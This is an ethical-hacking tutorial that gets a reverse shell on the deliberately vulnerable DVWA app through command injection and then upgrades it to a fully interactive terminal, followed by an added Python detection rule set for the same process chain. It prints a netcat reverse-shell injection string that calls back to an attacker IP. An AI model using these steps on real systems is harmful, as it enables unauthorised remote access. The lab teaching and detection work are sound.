One of the most exciting things about being an ethical hacker is, in my opinion, catching a reverse shell. Often, however, these shells are limited because they lack the full power and functionality of a suitable terminal. Certain things do not work in these environments and can be difficult to work with. Fortunately, with a few commands, we can upgrade to a fully interactive shell with all the bells and whistles.
Working with reverse shells can often be frustrating if all you have is a "dumb" shell. A dumb shell is a shell that lacks the full functionality of a proper terminal. This means that things like tab completion, keyboard shortcuts, and command history simply do not exist.
Certain commands like su do not work in dumb shells. Text editors also do not work well under these conditions, which can be painful.
Perhaps the most annoying thing that can happen (I'm sure it has happened to many of you) is accidentally losing your session by pressing the wrong key. Suppose you execute a command that hangs, and you instinctively press Control-C to abort it. Well, there goes your shell. That is frustrating, especially if it took many steps to get that shell in the first place.
However, with a bit of command-line magic, we can work around that limitation and end up with a fully functional interactive shell.
Step 1: Obtain a Limited Shell
To begin, we use command injection to get our initial shell. For demonstration, we use DVWA (Damn Vulnerable Web App), but you can use any similar test setup. Navigate to DVWA and sign in with the default credentials.
Next, go to the DVWA Security page and change the security level to Low. This ensures the exercise works as expected.
Now we can start a listener on Kali with Netcat to catch incoming connections to our machine. The flags can be grouped as -lvp, where -l starts a listener, -v makes it verbose, and -p sets the port (1234 in this exercise).
~# nc -lvp 1234
listening on [any] 1234 ...
In DVWA, navigate to the "Command Execution" page. This page runs a system command to ping an IP address supplied by the user, which lets us inject a command of our own.
The entire command is listed below. It tells the target to connect back to our machine on port 1234 using Netcat and then run a bash shell.
localhost && nc 10.10.0.1 1234 -e /bin/bash
Once we click "Submit", we should see a connection open on our listener. No prompt is displayed, only a blinking cursor.
10.10.0.50: inverse host lookup failed: Unknown host
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 52685
This is how many shells look, especially ones obtained through a web application. When we execute a command like id, we can see that it works.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Step 2: Create a Bash Shell
One of the simplest and most reliable ways to upgrade a dumb shell to a fully interactive one is with Python. If the target is a Linux box, it will probably have some version of Python installed.
First, check which version of Python is installed with the which command.
which python
/usr/bin/python
Usually this shows either python or python3. Now we can use it to create a proper bash shell. Below, the -c flag specifies the command to execute. In this case, the pty module is imported first. The pty module gives the shell pseudo-terminal functionality, which is needed by some commands that require a terminal environment to run. Then pty.spawn() starts a bash shell, and after pressing Enter we should see a real command prompt.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$
Well, that's a little better, but we still do not have tab completion or command history, and if we press Control-C it will kill the session. Next, we'll upgrade to a fully functional shell with a little Linux Fu.
The next thing we need to do is not intuitive: background the shell with Control-Z.
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ ^Z
[1]+  Stopped                 nc -lvp 1234
root@drd:~#
We need some information about our own terminal. Use the echo command to display the currently set terminal type.
~# echo $TERM
xterm-256color
Enter stty -a to display the terminal's settings.
~# stty -a
speed 38400 baud; rows 56; columns 213; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;
eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff
-iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt
echoctl echoke -flusho -extproc
Make note of the number of rows and columns. Next, enter the following command, which puts the local terminal into raw mode so that keystrokes such as Control-C are passed through to the remote shell instead of being interpreted locally, and turns off local echo.
~# stty raw -echo
Now enter fg to bring the backgrounded shell to the foreground. You will not see the letters on the screen as you type, but press Enter anyway; the Netcat command will be displayed automatically. Next, enter reset to reset the terminal. It will look strange as you type it, but it works.
~# nc -lvp 1234
reset
You may be prompted to set the terminal type. Sometimes the color version of xterm does not work, so we can just use the regular xterm instead.
reset: unknown terminal type unknown
Terminal type? xterm-256color
reset: unknown terminal type xterm-256color
Terminal type? xterm
If you cannot clear the screen or use the up arrow to view the history, use the following commands to set the terminal type and shell explicitly.
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ export TERM=xterm
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ export SHELL=bash
Now we just have to set the terminal size. Sometimes, when we drill down into a deep directory or have a very long prompt, the input wraps and becomes hard to read. By setting the rows and columns to match our native terminal, we avoid this.
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ stty rows 56 columns 213
We now have a fully interactive shell that lets us use keyboard shortcuts, clear the screen, keep command history, and use all the features of our favorite local terminal over a Netcat connection.
Today we learned about dumb shells and their limitations, as well as what can go wrong when using them. First, we got an initial shell via command injection. We then used Python to spawn a bash shell, and finally mirrored our local terminal configuration to upgrade to a fully interactive shell. With this technique, you can now reverse shell in style.
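From the defender's side, the same chain leaves a recognisable trail of process events: a web server spawning a shell, netcat run with -e, a shell whose parent is netcat, and pty.spawn and stty under the web-server account. The following added example (not code from the original post) runs a small rule set over constructed, simplified key=value event lines; the format, account names and program names are assumptions, not real auditd output.

```python
# Added defender-side example, not code from the original post. The events are
# a constructed, simplified key=value format (not real auditd output).
SAMPLE_EVENTS = """\
user=www-data parent=apache2 exe=/bin/sh argv=sh -c ping -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
user=www-data parent=sh exe=/bin/nc argv=nc 10.10.0.1 1234 -e /bin/bash
user=www-data parent=nc exe=/bin/bash argv=/bin/bash
user=www-data parent=bash exe=/usr/bin/python argv=python -c import pty; pty.spawn("/bin/bash")
user=www-data parent=python exe=/bin/bash argv=/bin/bash
user=www-data parent=bash exe=/bin/stty argv=stty rows 56 columns 213
user=alice parent=sshd exe=/bin/bash argv=-bash
user=alice parent=bash exe=/bin/stty argv=stty -a
"""

WEB_USERS = {"www-data", "apache", "nginx"}           # service accounts that never need a tty
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
NET_TOOLS = {"nc", "ncat", "netcat", "socat"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/bash"}

def parse_event(line):
    # argv is always the last field and may itself contain spaces
    head, argv = line.split(" argv=", 1)
    event = dict(kv.split("=", 1) for kv in head.split())
    event["argv"] = argv
    return event

def detections(event):
    # Return every reason (possibly none) this event matches the upgrade chain
    user, parent, exe, argv = (event[k] for k in ("user", "parent", "exe", "argv"))
    tokens = argv.split()
    reasons = []
    if exe in SHELLS and parent in WEB_SERVERS:
        reasons.append("shell spawned directly by a web server (command injection)")
    if tokens and tokens[0] in NET_TOOLS and "-e" in tokens:
        reasons.append("netcat launched with -e (reverse shell)")
    if exe in SHELLS and parent in NET_TOOLS:
        reasons.append("shell whose parent is a network tool (reverse shell)")
    if "pty.spawn" in argv and user in WEB_USERS:
        reasons.append("pty.spawn from a web-server account (tty upgrade)")
    if exe.endswith("/stty") and user in WEB_USERS:
        reasons.append("stty from a web-server account (terminal sizing after upgrade)")
    return reasons

def scan(text):
    # Run every event through the rules; return (user, exe, reason) alerts
    alerts = []
    for line in text.splitlines():
        event = parse_event(line)
        alerts.extend((event["user"], event["exe"], why) for why in detections(event))
    return alerts
```

Running scan(SAMPLE_EVENTS) flags five of the www-data events and none of alice's ordinary SSH session, which is the signal a SOC would alert on.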